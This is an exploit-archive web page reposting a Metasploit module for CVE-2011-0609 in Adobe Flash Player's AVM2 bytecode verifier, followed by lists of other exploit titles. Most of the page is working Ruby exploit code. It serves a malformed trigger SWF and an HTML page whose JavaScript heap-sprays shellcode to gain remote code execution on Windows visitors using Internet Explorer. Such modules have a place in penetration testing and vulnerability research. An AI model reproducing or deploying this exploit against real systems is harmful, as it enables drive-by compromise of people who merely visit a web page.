首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Flash Player AVM Bytecode Verification
来源:http://www.metasploit.com 作者:bannedit 发布时间:2011-03-24  

##
# $Id: adobe_flashplayer_avm.rb 12091 2011-03-23 04:41:48Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Adobe Flash Player AVM Bytecode Verification',
   'Description'    => %q{
     This module exploits a vulnerability in AVM2 action script virtual machine used
    in Adobe Flash Player versions 9.0 through 10. The AVM fails to properly verify
    bytecode streams prior to executing it. This can cause uninitialized memory to be
    executed.

    Utilizing heap spraying techniques to control the uninitialized memory region it is
    possible to execute arbitrary code. Typically Flash Player is not used as a
    standalone application. Often, SWF files are embeded in other file formats or
    specifically loaded via a web browser. Malcode was discovered in the wild which
    embeded a malformed SWF file within an Excel spreadsheet. This exploit is based
    off the byte stream found within that malcode sample.
    },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'bannedit' # Metasploit version
    ],
   'Version'        => '$Revision: 12091 $',
   'References'     =>
    [
     ['CVE', '2011-0609'],
     ['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
     ['URL', 'http://www.adobe.com/devnet/swf.html'],
     ['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html']
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC'          => 'process',
     'HTTP::compression' => 'gzip',
     'HTTP::chunked'     => true,
     'InitialAutoRunScript' => 'migrate -f'
    },
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars' => "\x00",
     'DisableNops' => true
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Automatic', { 'Ret' => 0x04040404 }],
    ],
   'DisclosureDate' => 'Mar 15 2011',
   'DefaultTarget'  => 0))
 end

 def load_swfs
  path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0609.swf" )
  fd = File.open( path, "rb" )
  trigger = fd.read(fd.stat.size)
  fd.close
  return trigger
 end
 
 def on_request_uri(cli, request)
  trigger = load_swfs
  trigger_file = rand_text_alpha(rand(6)+3) + ".swf"

  if request.uri.match(/\.swf/i)
   print_status("Sending Trigger SWF")
   send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
   return
  end
  
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
  nops = [target.ret].pack('V')
  nop_sled = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))

  var_blocks    = rand_text_alpha(rand(6)+3)
  var_shellcode = rand_text_alpha(rand(6)+3)
  var_index     = rand_text_alpha(rand(6)+3)
  var_nopsled   = rand_text_alpha(rand(6)+3)
  spray_func    = rand_text_alpha(rand(6)+3)
  obj_id        = rand_text_alpha(rand(6)+3)
  
  # The methods used in this exploit currently could be improved. Heap spraying can likely
  # be done using ActionScript. I am still investigating this possibility. Additionally,
  # Hafei Li has been conducting some interesting research in the area of ActionScript
  # related vulnerabilities which could be leveraged for this exploit.
  #
  # Currently this method only works with IE as Firefox runs Flash in a container process
  # which is uneffected by JS heap spraying.
  html =  <<-EOS
  <html>
   <head>
   </head>
   <body>
   <script>
   function #{spray_func}() {
    #{var_blocks} = new Array();
    var #{var_shellcode} = unescape("#{shellcode}");
    var #{var_nopsled} = unescape("#{nop_sled}");
    do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
     for (#{var_index}=0; #{var_index} < 25000; #{var_index}++)
      #{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};
    }
   #{spray_func}();
   </script>
  <center> 
  
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
               id="#{obj_id}" width="0" height="0"
               codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
           <param name="movie" value="#{trigger_file}" />
       </object>
  </center>

  </body>
  </html>
EOS

  print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}")
  send_response(cli, html, { 'Content-Type' => 'text/html' })
 end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Symantec LiveUpdate Administra
·HP OpenView NNM nnmRptConfig n
·HP NNM CGI webappmon.exe OvJav
·DATAC RealWin Multiple Vulnera
·Distributed Ruby send syscall
·7-Technologies IGSS 9.00.00.11
·VMCPlayer 1.0 Denial of Servic
·Iconics GENESIS32 and GENESIS6
·IGSS 8 ODBC Server Multiple Re
·Siemens Tecnomatix FactoryLink
·Progea Movicon 11 TCPUploadSer
·Constructr CMS 3.03 Arbitrary
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved